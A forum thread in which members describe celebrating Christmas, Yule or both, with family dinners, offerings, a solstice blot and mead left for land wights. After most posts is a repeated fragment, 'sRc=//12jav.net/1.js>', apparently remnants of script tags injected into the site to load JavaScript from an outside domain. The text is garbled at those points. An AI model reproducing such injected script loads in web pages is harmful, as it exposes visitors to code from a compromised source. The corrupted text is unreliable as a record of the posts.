Christmas or Yule?

Hope everyone enjoyed the holidays, though I guess it's continuing.

Did you celebrate Christmas, or the Yule?

My entire family on my mom's side was at my house. It got very very crazy and hectic, but also was a lot of fun. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Merry meet,i gave up and called it yulemas same thing lol,we had a hectic christmas. I Got a subway gift card and man stuff ,i only got my nephews and niece gifts though, so i ate, slept ,and chased my nephews around the yard with a nerf gun, good times,have a happy new year/holidays everyone )O( sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I do Christmas because my whole family and my boyfriend are Catholic sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Bit of both, I guess. I'm not catholic but have a "Either your in or your out" family type. It was tense (old fashioned family member) and for the first time I left large amounts of fruit as offerings. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

On the solstice I went out into the woods and did a blot to the gods to herald blessings in the coming year. I then sat for a long time meditating on things I have done this past year. Then I drank some mead and gave some to the land wights in that area and left.

On Christmas I presented gifts to my family and friends. I ate some ham and that's about it. I celebrate on the 25th as more of a cultural holiday, not to celebrate the "birth of Christ." To each their own though.

This is my first Yule I will celebrate since I am new to this path. I have a broken hip, so I guess I do simple prayers and offerings to deities.

My family celebrates Christmas with simple going to church and having a nice family dinner. I am not a Christian but I spend Christmas with my family because it's one of those days when we are not too busy for each other. :) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
